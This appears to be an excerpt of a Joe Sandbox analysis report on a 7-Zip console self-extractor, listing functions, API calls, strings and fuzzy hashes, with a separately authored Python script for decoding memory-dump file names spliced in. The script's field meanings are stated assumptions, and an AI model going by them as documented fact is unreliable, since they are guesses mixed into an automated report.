• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3398352648-0
                                                                                                                                                                                                                                • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                • Instruction ID: 400d42aee3bb60a65c35cf67ed5124fb3e06efd36999a220a9a9c8b4b77aa89a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B018C7361468187DB50CFA0E9887DA73A1F784B95F944136EB9A82A58CF3CC889CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D794C: FindClose.KERNELBASE ref: 001D795E
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 001D79BA
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 001D79FA
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D7A08
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2921071498-0
                                                                                                                                                                                                                                • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                • Instruction ID: ee079ebd1b2647b850817852b2078151e5bdad47a55b0ef68495db1cdf40e364
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42211C37208A8086DB21DF24E45039D6361F79A7B8F548322EAB9477D9EF38CA09C701
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                                                • API String ID: 0-2438533581
                                                                                                                                                                                                                                • Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                • Instruction ID: 8155a8c44fb579847cce83a44eec40ac74944b29d7777258ee080ba5af4c71f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D036132248EC082CB34EB26E4946AEB761F7E5BC4F554112EBAE47B25DF78D985C700

                                                                                                                                                                                                                                Control-flow Graph
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                                                • API String ID: 1639683984-435538426
                                                                                                                                                                                                                                • Opcode ID: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
                                                                                                                                                                                                                                • Instruction ID: 709fe9f5b678d17d77485b864e2a850391194b3ad28bbdbe09e1b7697e9dab50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09728B72319AC195CA30EF25E4943EEB3A1F7A5B80F444526DAAE43B19DF3CC5A5CB01
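The five .sdmp names repeated under "Memory Dump Source" in each function box describe one mapped module (process 0xB, image base 0x1D0000) region by region. The following decoder is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling. It assumes that the first dotted field is the process ID in hex (0xB = 11, which matches the "hcaresult_11_2_1d0000" snapshot name), the fourth the region base address, the fifth the page protection and the seventh the region type, the last two using the Windows MEMORY_BASIC_INFORMATION constants (0x20 = PAGE_EXECUTE_READ, 0x01000000 = MEM_IMAGE); fields 2, 3, 6 and 8 are parsed but treated as opaque. The W+X check at the end is what a writeable code section looks like once the image is mapped; for this module the code region at 0x1D1000 is execute/read only.

```python
"""Decode Joe Sandbox .sdmp memory-dump names (added example, not report code).

Field meanings assumed: field 1 = PID (hex), field 4 = region base address,
field 5 = page protection, field 7 = region type. Fields 2, 3, 6 and 8 are
kept opaque (assumption).
"""
import re
from dataclasses import dataclass

# Page-protection constants from winnt.h (low byte of Protect) and modifier bits.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_NAME = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]+)\.(?P<f2>[0-9A-Fa-f]+)\.(?P<f3>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE, WRITECOPY and their EXECUTE_ forms

    @property
    def image_backed(self) -> bool:
        return self.mem_type == 0x1000000  # MEM_IMAGE: mapped from a PE on disk


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into a DumpRegion; raises on anything else."""
    m = SDMP_NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a .sdmp name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
    )


def wx_regions(regions):
    """Regions that are writable and executable at the same time."""
    return [r for r in regions if r.writable and r.executable]


# The five dumps listed in the report for the module at 0x1D0000 in process 0xB.
REPORT_DUMPS = [
    "0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp",
]


def describe(names=REPORT_DUMPS):
    """Print one line per region and the list of W+X regions; return the regions."""
    regions = [parse_sdmp_name(n) for n in names]
    for r in regions:
        print(f"pid {r.pid:>3}  base 0x{r.base:08X}  {r.protect_name:<22} "
              f"{MEM_TYPE.get(r.mem_type, hex(r.mem_type))}")
    print("W+X regions:", [hex(r.base) for r in wx_regions(regions)] or "none")
    return regions


if __name__ == "__main__":
    describe()
```

Run as-is it lists the header page as read-only, 0x1D1000 as execute/read, 0x23C000 as read/write and the rest read-only, all MEM_IMAGE; feed it the dump names of a different module to see whether any region is both writable and executable.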

Control-flow Graph
(rendered as an image in the original report; the executed/not-executed colouring is not recoverable here. Entry block 219b5d, blocks up to 21a6c9; imported calls reached in the graph: fputs, free, _CxxThrowException.)
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputcfputsfree
• String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
• API String ID: 2822829076-727241755
• Opcode ID: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
• Instruction ID: 4a8b50ceb48a7e0161166495fbbe9d40e9fd1b20411c4299a870aedecdab6353
• Opcode Fuzzy Hash: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
• Instruction Fuzzy Hash: 31224B32319AC1A1CA34EF25E5943EEB3A1F7A5B80F444126DBAE43B19DF38C5A5C701

Control-flow Graph
(rendered as an image in the original report; the executed/not-executed colouring is not recoverable here. Entry block 1fa180, blocks up to 1fa73e; imported calls reached in the graph: GetProcAddress, SysStringByteLen, free.)
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AddressProc
• String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
• API String ID: 190572456-3984264347
• Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
• Instruction ID: 0c252e906d0347f1f0c07690ad1c104416afa1ffaae58609ea32486d1ea5f37b
• Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
• Instruction Fuzzy Hash: 62D18672319AC496C720EB21E8807AEB3A5FBE5780F845512EB8E87B19DF7CD545CB01

Control-flow Graph
(rendered as an image in the original report; the executed/not-executed colouring is not recoverable here. Entry block 1d70c8, blocks up to 1d7458; imported calls reached in the graph: CreateDirectoryW, GetLastError, free.)
APIs
  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNELBASE ref: 001D7D6E
  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNEL32 ref: 001D7DA5
  • Part of subcall function 001D7D4C: free.MSVCRT ref: 001D7DB2
• free.MSVCRT ref: 001D73F6
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AttributesFilefree
• String ID:
• API String ID: 1936811914-0
• Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
• Instruction ID: 61c53a6120d62c25607e5645eb1c54979fe589874a0baf20fdf938211e27043d
• Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
• Instruction Fuzzy Hash: 2281512221C58192CA20EF21E45166EA331FBE5784F445123FF9E877A9EF38D945D711

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D812F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D816A
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D817F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D8232
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetModuleHandleW.KERNEL32 ref: 001DABD1
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetProcAddress.KERNEL32 ref: 001DABE1
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetDiskFreeSpaceW.KERNEL32 ref: 001DAC32
                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 001D818F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D819B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D81A6
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D81BB
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D8243
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D824E
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D815F
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                                                • String ID: :$:$DATA$\
                                                                                                                                                                                                                                • API String ID: 4130059181-1004618218
                                                                                                                                                                                                                                • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                • Instruction ID: c5a09588bb05a58ddbd6e665662227ee5203fa457dddddff6e2938926b93d2f7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1202E773504680D6CB20DF29E59026EB770F7A5750F808227E79E87B68EF34D9A6CB04

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                                                • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                                                • API String ID: 2701146716-1919703766
                                                                                                                                                                                                                                • Opcode ID: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                                                                                                                • Instruction ID: 6bc815c0465cb8888c230135113aaea6677290f740a622c02de41a9f5cad5383
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B919136224A8592DB10EF22E9547AE73B1F7A9BC4F405122EF5E47B18DF38C9A5C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 001DFA52
                                                                                                                                                                                                                                • SeLockMemoryPrivilege, xrefs: 001DF9CB
                                                                                                                                                                                                                                • SeRestorePrivilege, xrefs: 001DF91C
                                                                                                                                                                                                                                • Unsupported switch postfix -bb, xrefs: 001DF8C3
                                                                                                                                                                                                                                • SeCreateSymbolicLinkPrivilege, xrefs: 001DF92A
                                                                                                                                                                                                                                • Unsupported switch postfix for -slp, xrefs: 001DF991
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                                                • API String ID: 1961088698-2328792591
                                                                                                                                                                                                                                • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                • Instruction ID: 1553a6db96295eeb07151e60d1bbc8d65bdf3a7e4cc7feaae971f55fd89ebf01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABA1AF73A08AC4D9DB11DF25D4903AC3B60E7A5B94F98807BDB9D47726CF28CA86C710

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                                                                                • String ID: Errors: $Warnings:
                                                                                                                                                                                                                                • API String ID: 437615013-2345102087
                                                                                                                                                                                                                                • Opcode ID: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                                                                                                                • Instruction ID: 1749c53fc767a83c65e72ac021fe62122c6ba98f2e39f52f12cabfe829107142
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C35194627295C191C930EF25E9913EEA3A2F7B5790F484123DAAD17759CF3CC8D68701

Control-flow Graph
[Control-flow graph of the function whose first basic block is at 1f83c8; node and edge listing omitted]
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID: 7z.dll$Codecs$Formats$Path$Path64
• API String ID: 1534225298-3804457719
• Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
• Instruction ID: ddd78be3578440a62591ce33acebbbe18c5c34dc2f10b0e7a344325920609f76
• Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
• Instruction Fuzzy Hash: 1B51646220564591DE20EF15E8513A9A730E7E67E4F885223FB6E577B9CF3CC68AC700

Control-flow Graph
[Control-flow graph of the function whose first basic block is at 1fab74; node and edge listing omitted]
APIs
• free.MSVCRT ref: 001FABC9
• free.MSVCRT ref: 001FACF3
• free.MSVCRT ref: 001FACFE
• free.MSVCRT ref: 001FAD95
• memmove.MSVCRT(?), ref: 001FADCB
• free.MSVCRT ref: 001FAE70
• free.MSVCRT ref: 001FAF7F
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94DB
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94E3
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94F0
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F951C
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F9525
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F952D
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F953A
• free.MSVCRT ref: 001FAEC2
  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
  • Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAA95
  • Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAAC5
  • Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAAD2
• free.MSVCRT ref: 001FAEFA
• GetProcAddress.KERNEL32 ref: 001FAF4D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove$AddressProc
• String ID: 7z.dll$Codecs\$Formats\$SetCodecs
• API String ID: 4053071709-2499791885
• Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
• Instruction ID: 0a74a9f7efce6ecc611a7d0b199900673d635266ebc9c907ee8bde1ad2a9e5ca
• Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
• Instruction Fuzzy Hash: 43B1D2B6214AC596CB20EB21E4903BFB760F795788F944112EB9E47B25CF7CC969C702

Control-flow Graph
[Control-flow graph of the function whose first basic block is at 211850; node and edge listing omitted]
APIs
• EnterCriticalSection.KERNEL32 ref: 00211877
• fputs.MSVCRT ref: 0021190A
• LeaveCriticalSection.KERNEL32 ref: 00211A44
  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
• fputs.MSVCRT ref: 0021194D
  • Part of subcall function 001D26A0: fputs.MSVCRT ref: 001D26C1
• fputs.MSVCRT ref: 002119CB
